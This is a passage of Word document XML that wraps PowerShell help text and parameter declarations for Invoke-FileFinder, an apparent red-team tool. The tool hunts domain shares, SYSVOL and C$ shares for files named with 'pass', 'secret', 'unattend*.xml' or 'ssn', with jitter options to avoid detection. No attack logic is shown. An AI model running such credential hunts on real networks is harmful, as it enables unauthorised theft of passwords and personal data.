        <w:t xml:space="preserve">        Search all domains in the forest for target users instead of just</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571DE5C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        a single domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3104506B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0D8DE5E7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER SearchSYSVOL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B977E8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4139C078" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Search for login scripts on the SYSVOL of the primary DCs for each specified domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F99967B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="222ED330" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79689E7E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3D95419B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The maximum concurrent threads to execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2202BEA3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5E583932" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER UsePSDrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79972607" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="369AC5D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Mount target remote path with temporary PSDrives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA4A723" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="49ACE858" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095A50C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="68D905AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Invoke-FileFinder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BBD0EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="084B29CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Find readable files on the domain with 'pass', 'sensitive',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468F9A87" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        'secret', 'admin', 'login', or 'unattend*.xml' in the name,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E280CF4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3185B34D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713C4F76" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="31C14E71" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Invoke-FileFinder -Domain testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEB002B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="55725786" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        Find readable files on the 'testing' domain with 'pass', 'sensitive',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E948AB8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        'secret', 'admin', 'login', or 'unattend*.xml' in the name,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439A82EB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="199D558E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E7D671" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="301A8D2F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Invoke-FileFinder -IncludeC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A71FA4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="777588B4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Find readable files on the domain with 'pass', 'sensitive',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730A4F15" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        'secret', 'admin', 'login' or 'unattend*.xml' in the name,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D88D5D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        including C$ shares.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35803A4D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1349616F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012BA16A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="01DC1AEE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Invoke-FileFinder -ShareList shares.txt -Terms accounts,ssn -OutFile out.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7401D182" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="04CF64A6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Enumerate a specified share list for files with 'accounts' or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2354D533" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        'ssn' in the name, and write everything to "out.csv"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0883D568" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="449E9C05" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .LINK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D45039" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        http://www.harmj0y.net/blog/redteaming/file-server-triage-on-red-team-engagements/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53165D78" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1C0C985E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3E0479" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="283E63E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8AAB57" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDC2B6E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position=0,ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7AFA7F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('Hosts')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE8A463" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F76A65" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB9650D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6F66A50C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateScript({Test-Path -Path $_ })]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD6AAFB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('HostList')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796A2F21" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799EFDEB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerFile,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6380272A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="466B6DC5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225EED8B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerFilter,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECBB235" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="57806462" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7397E83A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B4F71A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2A786801" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateScript({Test-Path -Path $_ })]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683AB3BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0E87DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ShareList,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7F358D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3A363D43" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD9016A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $OfficeDocs,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191823B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4E1DEB28" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD33DA9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $FreshEXEs,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF17E51" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1187E86F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('Terms')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EC994E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C21AE9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SearchTerms, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318EFA64" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5528AC70" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateScript({Test-Path -Path $_ })]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146C2F6D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15642598" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TermList,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E02E626" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="104426E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219569BA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $LastAccessTime,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C05B712" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="024D17B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629389CA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $LastWriteTime,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511A0112" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6DA7F597" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F858AD4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $CreationTime,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212BD34A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2955836B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509F68ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $IncludeC,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8929C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3F13D344" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769C9EBB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $IncludeAdmin,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718273A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="349ABF88" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB2885E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ExcludeFolders,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F264E52" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2B978744" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2D0FB2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ExcludeHidden,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC01142" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1962D28B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F33CF7F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $CheckWriteAccess,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AC3367" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="463C9810" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA266A6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $OutFile,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A48A7B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="50565D1C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3EE858" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $NoClobber,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34644466" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="05A0BB06" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023390FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $NoPing,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4D785A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2A0ECAA6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [UInt32]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14810465" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Delay = 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3492521C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6C64D795" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Double]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AF600B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Jitter = .3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A047C03" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="091635DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341D30A9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE080E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="65BE495A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5010F250" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352CC121" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F9CF34" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8ECAEA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SearchForest,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330B68B9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="57BD4265" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A8F795" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SearchSYSVOL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772ECF44" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="59D25020" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,100)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7458AF2B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0944F2C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Threads,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352223A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="79BE2DA1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE97EA4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UsePSDrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAC0484" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6135F280" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
